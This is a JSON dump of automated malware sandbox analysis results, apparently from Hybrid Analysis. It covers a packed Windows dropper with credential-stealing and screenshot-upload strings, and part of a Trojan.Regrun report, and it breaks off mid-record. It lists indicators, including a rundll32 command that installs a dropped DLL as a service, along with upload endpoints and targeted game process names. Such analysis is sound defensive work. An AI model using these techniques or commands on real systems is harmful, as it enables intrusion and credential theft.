{"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"HTTP/1.0\" (Indicator: \"HTTP/1.0\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found string \"HTTP/1.0\" (Indicator: \"HTTP/1.0\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-511", "type": 2, "relevance": 1, "name": "Contains ability to upload file/data", "description": "Found string \"Content-Type: multipart/form-data; boundary=\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found string \"Content-Disposition: form-data; name=\"trackdata\"; filename=\"\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\"), Found string \"Content-Disposition: form-data; name=\"submitted\"\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\"), Found string \"!This program cannot be run in DOS mode.Rich.text`.rdata@.data.rsrc@.reloc_^]3SUVW1FG;_^][QWRVU_^]3_^][urhDatbh\\T$ QRj_^]3SUV3T$ hD$ h`aL$ h4T$ h\\aL$ PQD$ RP_^][_^][_^]3~FW3_^]3VWUhL$ hT$dPRUD$WVL$4QST$(j_^][~BSUgfffWVhdbSUVWhD$$SRPD$$P|$,jL$ jT$4PRVD$@(L$ Q_^][_^]3_^][SUV3UPhHL$TPVQT$ThL$XPQT$\\PD$TP\\$8PL$TQh_^][`SUV3WVVVhL$0QjD$H(t$\\PjBT$tj(PQj|$xW_^]3L$(jl$2fD$4BMD$>6RSPV_^][SUVPPPhRPVWUj^][_SUVWD$XfT$hfL$4fD$ fvgh4cD$0PSQRjj(h49-tfuG9-pf_^][D$%jL$ QhSVW3VVj(hPSht><\\t<:t><\\t<:t~0SV^[_]SUVW3yxxx_^][Ph0@SUVWh_^][>+u?j(Pj>ju)_^][_^][|$XhD$\\PQT$XWWjD$TWPhL$DfL$8fD$LfD$@fT$$fT$(QD$ RL$ PQT$HjL$8jD$ ;T$0jL$PjT$@jL$(jWWWh0L$(h(fT$$h fD$$PjOutputDebugStringAFreeLibraryGetProcAddressLoadLibraryAlstrcatAGetSystemDirectoryAExitProcesslstrcpyAlstrcmpASleeplstrlenAlstrcmpiAGetTickCountlstrcpynACloseHandleGetFileSizeReadFileCreateFileADeleteFileAMultiByteToWideCharGlobalFreeGlobalUnlockWriteFileGlobalLockGlobalAllocGetTempPathAProcess32NextProcess32FirstCreateToolhelp32SnapshotWideCharToMultiByteCreateThreadGetCommandLineAIsBadReadPtrGetModuleFileNameAGetCurrentProcessIdUnmapViewOfFileMapViewOfFileOpenFileMappingAGetLastErrorCreateMutexAKERNEL32.dllReleaseDCGetDCIsRectEmptyGetWindowThreadProcessIdFindWindowExAFindWindowAPrintWindowGetWindowInfoSetForegroundWindowShowWindowGetActiveWindowIsIconicIsWindowVisibleGetWindowTextAGetSystemMetricsEnumWindowsCallNextHookExSetWindowsHookExAUnhookWindowsHookExPostThreadMessageAUSER32.dllGetDIBitsRealizePaletteSelectPaletteGetStockObjectGetObjectADeleteDCGetDeviceCapsCreateDCADeleteObjectBitBltSelectObjectCreateCompatibleBitmapCreateCompatibleDCGDI32.dllADVAPI32.dllInternetCloseHandleInternetReadFileHttpQueryInfoAInternetOpenAInternetQueryDataAvailableHttpSendRequestAHttpOpenRequestAHttpEndRequestAInternetWriteFileHttpSendRequestExAHttpAddRequestHeadersAInternetConnectAWININET.dllWS2_32.dllGdipGetImageEncodersGdipGetImageEncodersSizeGdiplusShutdownGdipSaveImageToFileGdipLoadImageFromFileGdipAllocGdiplusStartupGdipFreeGdipDisposeImageGdipCloneImagegdiplus.dllstrstratoimemmovefreemalloc??3@YAXPAX@Zwcscmp??2@YAPAXI@Z_except_handler3sprintfMSVCRT.dllWLDL.dllInstallServiceKsCreateAllocatorKsCreateClockKsCreatePinKsCreateTopologyNodewwhkfwwhko/flash.asp/wmgmb.asp/wmrmb.asp/getgif.aspaction=up&zt=InternetOpenUrlA\\Wininet.dllInternetConnectASetFilePointer\\kernel32.dllVirtualProtectofflineok&uofflineonline&onlineisonlineContent-Type:application/x-www-form-urlencodedAccept: */*POSTHTTP/1.0http://Content-Type: multipart/form-data; boundary=Content-Type: image/pjpegContent-Disposition: form-data; name=\"trackdata\"; filename=\"helloContent-Disposition: form-data; name=\"submitted\"strBoundaryUpload---------------------------7b4a6d158c9upPage.jpgDISPLAY.bmpShell EmbeddingContainerTT_WebCtrlTTraveler.exeTheWorld.exe360SE.exeNeroCometBrowserChromiumAppleAvantTencent TravelerOrcaGreenBrowserFirefoxOperaInternet ExplorerphotoExcelWordXnViewACDSee&zt=waitmbhaction=up&u=&mbm=&zt=showmbm&ck=&fm=&mbh=&jb=&dj=&js=7dgsdjfsdhygusdfds8f7dserfwqejr89fsKsCreateAllocator\\ksuser.dllKsCreateClockKsCreatePinKsCreateTopologyNodeLogin.PassWordxyjonline.exexyjgamegame.execxyjqwertyxyjqwertyexplorer.exe!This program cannot be run in DOS mode.Rich.text`.relocmhzxtext.dllLoadLibraryAKERNEL32.dllLoadDLL.dllKsCreateAllocatorwoool.KsCreateAllocatorKsCreateClockwoool.KsCreateClockKsCreatePinwoool.KsCreatePinKsCreateTopologyNodewoool.KsCreateTopologyNode&0,0010:0A0L0S0Z01Q1Z1a1l1s1z12#2*20262<2C2J2Q2X2_2f2m2t2{23#3-333:3@3G3P3W3]3f3n3u34!4(4/4Z4445:5E5V5`5f5l5r5}56!6.636B6G6N6S6_6d6p6u6707;7B7k78-888A8M8Y89 9w9~9:2:S:;E;R;X;];f;o;<q<z<=<=C=I=R=^=j=v=>.>I>T>|>?(?q?0'0H0v02-2X2y23%333=3384]4k4q44)545M5S5a5r5656<6C6q67$707O7U7^7j78(858B8M8V8d8r8~89)989A9K9Y9b9l9v9:\":,:5:?:L:X:e:r:~:;(;4;A;K;?\"?+?V?`?j?!0>0[0i00\n1Q1W1i1o1t1}1222?2Z23-3D3}34\"4.4=4F4O45#5)5/555;5B5I5O5U5_5t56*676a6t6~67A7O7f7}7818;8B89=9N9W9e9v9:!:&:,:3:8:?:D:K:P:^:e:j:q:v:}:;%;*;1;6;=;B;I;N;U;[;d;i;u;z;<%<*<8<B<x<=;=`=>1>:>A>L>S>Z>}>>1?:?A?L?S?Z?0>0G0Q0Y0a0f0q0x00@1b1{1142P231484B4G4Y4^4d4n4s4y4656=6f6r67)7=7S7_7k7}778+858\\8r8x8~8\"; File: \"908501218x27.dll\")\n Found string \"Content-Type: multipart/form-data; boundary=\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found string \"Content-Disposition: form-data; name=\"trackdata\"; filename=\"\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\"), Found string \"Content-Disposition: form-data; name=\"submitted\"\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\System32\\rundll32.exe\" (Indicator: \"\\Device\\\"; Source: \"00000000-00004920.00000000.138847.002E0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-91", "type": 2, "relevance": 1, "name": "Contains ability to hook/unhook windows functions (API string)", "description": "Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"SetWindowsHookExA\" (Indicator: \"SetWindowsHook\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"SetWindowsHookExA\" (Indicator: \"SetWindowsHook\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"908501218x27.dll\" claimed CRC 0 while the actual is CRC 140842", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegOpenKeyExA\n RegCloseKey\n CreateToolhelp32Snapshot\n Process32First\n LoadLibraryA\n GetModuleFileNameA\n Process32Next\n OpenProcess\n LockResource\n DeleteFileA\n WinExec\n GetProcAddress\n GetTempPathA\n MapViewOfFile\n GetModuleHandleA\n WriteFile\n CreateFileMappingA\n GetSystemDirectoryA\n TerminateProcess\n Sleep\n CreateFileA\n GetTickCount\n OutputDebugStringA\n FindResourceA\n GetWindowThreadProcessId\n OpenFileMappingA\n GetCommandLineA\n CreateThread\n GetFileSize\n FindWindowExA\n SetWindowsHookExA\n FindWindowA\n HttpSendRequestA\n InternetQueryDataAvailable\n InternetWriteFile\n InternetCloseHandle\n InternetOpenA\n InternetReadFile\n InternetConnectA\n HttpQueryInfoA\n HttpSendRequestExA", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" wrote 26624 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\908501218x27.dll\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" wrote 26624 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"908501218x27.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\908501218x27.dll]- [targetUID: 00000000-00004528]\n \"x27x.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\x27x.dll]- [targetUID: 00000000-00004528]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "string-45", "type": 2, "relevance": 3, "name": "Possibly checks for the presence of a forensics/monitoring tool", "description": "Found string \"avp.exe\" (Indicator: \"avp.exe\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has a section named \"UPX0\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\" has a section named \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"ping 0, GenuineIntel\" (Indicator: \"ping\"; Source: \"00000000-00004920.00000000.138847.002E0000.00000004.mdmp\")\n Found string \"ping 0, Gen\" (Indicator: \"ping\"; Source: \"00000000-00004920.00000000.138847.002E0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"cmd /c %WINDIR%\\\\system32\\\\rundll32.exe %TEMP%\\\\x27x.dll,InstallService C:\\\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (UID: 00000000-00004936)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00004528)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "string-417", "type": 2, "relevance": 1, "name": "Contains ability to identify remote systems", "description": "Found string \"ping 0, GenuineIntel\" (Indicator: \"ping \"; Source: \"00000000-00004920.00000000.138847.002E0000.00000004.mdmp\")\n Found string \"ping 0, Gen\" (Indicator: \"ping \"; Source: \"00000000-00004920.00000000.138847.002E0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"rundll32.exe\" marked \"C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"rundll32.exe\" opened \"C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"WinExec\" with parameter cmd /c %WINDIR%\\system32\\rundll32.exe %TEMP%\\x27x.dll\nInstallService C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe (UID: 00000000-00004528)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-115", "type": 9, "relevance": 10, "name": "Detected Rundll32 process execution", "description": "Process \"rundll32.exe\" with commandline \"%TEMP%\\\\x27x.dll,InstallService C:\\\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (UID: 00000000-00004920)", "origin": "Monitored Target", "attck_id": "T1218.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/011"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "static-97", "relevance": 10, "name": "PE file contains executable resources", "description": "c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4 has PE file in resource with name: \"LODR\" and filetype:PE32 executable (DLL) (GUI) Intel 80386\n for MS Windows\n 908501218x27.dll has PE file in resource with name: \"PDLL\" and filetype:PE32 executable (DLL) (console) Intel 80386\n for MS Windows\n x27x.dll has PE file in resource with name: \"PDLL\" and filetype:PE32 executable (DLL) (console) Intel 80386\n for MS Windows", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1
https://hybrid-analysis.com/sample/05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1
Hybrid Analysis - Killers
{"size": 163903, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "av_detect": 93, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 164, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 163903, "sha256": "1ba33ceb09dea514de108be4a69fdb85e3a47c19b32250f583f25d0a3f55789a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\CSRSS.EXE", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%LOCALAPPDATA%\\D3_08.exe", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%LOCALAPPDATA%\\IExplorer.exe", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\LSASS.EXE", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\SERVICES.EXE", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\SMSS.EXE", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 163903, "sha256": "af9ec370536ae157f1f4db600c89b60f9c77f5d8bd6660de7d1e0290e51eb4a1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 163903, "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 163903, "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": 